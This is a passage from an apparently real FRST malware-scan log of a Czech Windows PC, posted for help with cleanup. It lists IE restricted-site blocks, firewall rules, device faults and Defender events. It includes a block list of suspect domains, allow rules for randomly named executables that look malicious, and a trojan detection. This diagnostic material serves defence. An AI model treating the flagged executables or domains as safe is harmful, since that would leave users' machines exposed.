2018-04-12 00:34 - 2018-04-12 00:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-12 09:01 - 2018-11-09 03:17 - 002759680 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-12-14 19:16 - 2018-12-14 19:21 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\adawareantivirusservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\adawareantivirusservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

There are 7865 more sites.

IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123simsen.com -> www.123simsen.com

There are 7865 more sites.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-195099987-321758953-278711717-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\ulol\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "BlueStacks Agent"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{680A3119-9C48-4A9D-8F3E-DCBBF626867E}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{9CD32ACD-CFD6-45A4-B4DF-C9EF3A4052CB}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{0C967B64-CE0C-456C-B174-8178F48D6104}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [TCP Query User{D803BB9E-7542-4BAA-920B-DAA1792A535A}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [{74BBCAA8-0F85-4E7C-AB86-EBFEFC54D83F}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{EF7CD7A6-B6AD-4289-952D-49D310DF7E02}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{1F3F6959-FCD3-404A-95E2-17B36DCB540F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3B79ECD1-9CEC-4E00-B545-A2262DDC26BA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [UDP Query User{6C071EF6-C6C0-4D88-B919-ACD84451EF09}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [TCP Query User{01339B68-9EF4-4C99-8E75-3C99DCBE8EF1}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [{418D3690-1654-4D36-9C65-E4881416F186}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{FD052E8D-5947-4005-9113-A4B0DA632966}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{865BC1B9-BDE3-408E-923A-336E538AB506}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2AC8C8A2-451C-4D9E-935F-4999B88AF985}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2BA6C829-EF73-4535-A7F7-CA54E9CB4E93}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{2221AC8E-0468-49A9-A0AE-489AC315ADF2}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{BA30716E-B3D5-4765-BFD4-2BFAB06F3A6E}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{C5027FDD-ABB1-4575-9FEB-30CEF15A0174}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{44620DE5-6297-4A22-853E-0F6BE8BC6C95}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\Scan2PCNotify.exe
FirewallRules: [{0125CC0F-2664-4DDC-8773-036A1480E45E}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\ScanProcess.exe
FirewallRules: [{10FEC841-DB04-4EC4-B51B-926818D78CEF}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\CDAS2PC.exe
FirewallRules: [{1B2BD275-5E88-4056-97F9-B9F00CEF4644}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe
FirewallRules: [{DE602CDB-BEB2-49D6-8108-72A718061FA8}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDSAlert.exe
FirewallRules: [{8D7B0C18-C2F1-4044-924F-CB7ABE7F31C5}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe
FirewallRules: [{65B2ED45-5E31-4CC1-92C6-8038109E3170}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDS.Application.exe
FirewallRules: [{8AB3011A-5645-45FF-A547-B893F1D2B6BF}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{B4F4E17F-C2EF-4854-AD4C-8B2708E8AC1F}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{6FA07099-4EA9-452A-9FA8-995B59ECAE90}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [UDP Query User{AC472FF0-E9BA-477F-8C59-E0CF6E26B1F6}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{29EB2B2E-4FA2-4FA9-ADB8-FB3EA85EE2C0}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{1B152717-C9E6-4543-87BB-5D4E311A0B0F}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [{100C66FD-2DCC-4B01-8D14-02FFD2C069A9}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [UDP Query User{632511C2-DDFC-4CEF-8C55-A82E8EB56B2A}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{809F3FAE-2B59-440B-8219-81CB5996542E}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{58ECFD65-9A3C-47BA-AB19-B2A27BACEC84}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{3E457CE4-B263-445B-916E-10B85CEBE320}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [UDP Query User{80F90ED6-45B2-4117-84CF-FBCBE2F06D08}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{5DAE795F-7DD0-4F03-A957-23178027EC7F}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{76359A4C-3A58-4EE1-A908-4ADE16275DBF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{0FF7A781-7AB7-4397-B417-0E5504F6C62C}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [UDP Query User{946CEECC-8221-41F2-AF67-5BF9A2797A88}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{C8A027E8-6DAB-4F49-9015-1E2037DE8C23}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{DFF9485B-1726-4727-ACCD-1E22F49A5F76}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0516401-11A3-4DCC-A5CB-691CF7FA910D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A8991BE6-8068-4C4F-8482-08861EAF061C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3144E693-40E1-40BA-AD59-C5B0752F98E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{DE99C12C-1421-4D07-B3C1-5D2D854A4EFD}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{76B4001E-0ACD-45A3-A91A-18D739417786}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{80E9FEE1-E9D6-415C-9E57-42C9395DCACF}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{420EDF67-B57A-4B23-B6AF-93ACAC9F0A06}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{5429A441-852D-4C25-B0E9-E8FCDF25881D}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{36A60251-4723-4B9D-95BF-290C0B9D73F2}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{F0DBA328-0448-42C9-81D0-3B92A1739F2E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [TCP Query User{FCDD228F-1357-42C4-A39B-A63F1B07F474}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [UDP Query User{6D3942CA-B064-4120-BD2B-6B02B318653B}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [{BF4317CC-2B83-4958-8B97-1061A97E93EE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{BD7AE586-6CAC-4892-B735-4CA80B0D3D62}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{8C18F3D0-FC27-424D-B0B3-02980A9FA42C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{4D7D2769-DF79-481A-9CBF-F959AED5BC99}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{35A3D09F-CE17-4CA2-94B6-F4247ED5F3EC}] => (Allow) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
FirewallRules: [{226B719A-7399-44FC-8195-1ECE66B04A97}] => (Allow) C:\WINDOWS\SysWOW64\xeAwY.exe
FirewallRules: [{B89F5B34-5FB4-44EA-80BB-D163442646A0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{E2EDB791-F173-4372-AC7B-034B9710C230}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC9DADB6-8473-43D2-96FD-FD726E9BB013}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{193F2B1F-0DA9-4711-887F-3ED626016202}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{9D2B0873-BC44-4EDC-95A6-643FB1055664}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CF7AEC5F-4D63-4972-AC11-1DCE22095F46}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{823D3430-D5F0-4AD2-BCF8-BB4839A12AB9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{376867FA-3140-4A61-9CBA-168DCE9B8216}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{B6D40083-1F4E-477A-9015-8DC7E9A6A3C1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7E62B397-4825-42F8-9A15-E6ED471E0842}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{17289A97-0812-45DA-B9F8-824BEEE7D45C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC971134-8067-4B9F-9EB2-3A04D2DD62F1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CE24B0E2-FC9C-4416-BF6D-2E4943991655}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C521D663-E846-45B1-B592-DEB0438CD546}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{4D14BB88-E721-4A09-9B0C-45C52C06B6A0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{98AE550D-AE3C-4286-907C-A78F1169EAD6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D55FDDCB-BD31-40A3-9B65-005FC38D9A7B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{DF498C8A-17E0-4FE0-8B77-16FDB398E8E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{987D7429-B9D0-4E08-A619-DA0B50A3E051}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{05AFB857-23D0-40D7-9E9E-EBD50D6AF0BC}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7E6397DA-11FF-495D-BBDA-EDB0E1F8C2B7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{70248E8A-4E3E-49D2-8A4B-184E4DC26B78}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7D8251D0-28ED-4EDE-9545-D62A8457EEBF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D8165305-DF6F-458E-B77A-D66DD8119582}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F49A626E-6773-48DD-B529-1D2CABA6DB40}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{2BB23635-3555-4760-8329-9C3E6BEC50D9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{5EF6B97B-6CC2-4D6D-A2FD-2170143E542C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CC44B33F-2809-487C-8B49-0064BD70855A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{73400E7A-F989-43CB-84D0-D1EA511B25F9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{380E9148-9BA9-482E-A41C-82E22059545A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe

==================== Restore Points =========================

07-01-2019 21:54:57 Naplánovaný kontrolní bod
11-01-2019 13:06:14 Operace obnovení

==================== Faulty Device Manager Devices =============

Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Intel(R) Display Audio
Description: Intel(R) Display Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Intel(R) Corporation
Service: IntcDAud
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver


==================== Event log errors: =========================

Application errors:
==================
Error: (01/11/2019 07:21:15 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program FRST64.exe verze 28.9.2018.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 81c

Čas spuštění: 01d4a9da621b2079

Čas ukončení: 4294967295

Cesta k aplikaci: C:\Users\ulol\Desktop\FRST64.exe

ID hlášení: 187dcaa4-a6f5-43e1-8e70-26011cd6b2cf

Úplný název balíčku s chybou: 

ID aplikace související s balíčkem s chybou:

Error: (01/11/2019 07:17:54 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program chrome.exe verze 71.0.3578.98 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 216c

Čas spuštění: 01d4a9d8261c0564

Čas ukončení: 4294967295

Cesta k aplikaci: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

ID hlášení: d70709be-36cf-4a36-8147-5f1c494ffb79

Úplný název balíčku s chybou: 

ID aplikace související s balíčkem s chybou:

Error: (01/11/2019 07:09:55 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:54 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:53 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:51 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:50 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:49 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.


System errors:
=============
Error: (01/11/2019 07:41:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:47 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:38 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:32 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:26 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:16 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:04 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:40:42 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}


Windows Defender:
===================================
Date: 2019-01-11 13:05:02.337
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {C7624ED8-55B8-4C11-A697-F488F786E077}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Úplné prohledávání
Uživatel: DESKTOP-VBSMI5O\Martin

Date: 2019-01-10 19:36:54.115
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {3AEA90E1-AC2C-415F-92A2-FF1B00481283}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:23:18.123
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B5282268-AE53-47D3-948C-ECE9541D4170}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:01:02.490
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B8CB204C-EF17-40F0-8A73-72ED9379FE3F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 17:30:21.507
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:JS/Redirector!rfn&threatid=2147692383&enterprise=0
Název: Trojan:JS/Redirector!rfn
ID: 2147692383
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\ulol\AppData\Roaming\product.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-VBSMI5O\Martin
Název procesu: C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp
Verze podpisu: AV: 1.283.2606.0, AS: 1.283.2606.0, NIS: 1.283.2606.0
Verze modulu: AM: 1.1.15500.2, NIS: 1.1.15500.2

Date: 2019-01-11 13:46:01.063
Description: 
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.  
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

CodeIntegrity:
===================================

Date: 2019-01-11 19:23:44.957
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 19:02:52.546
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:50:49.237
Description: 
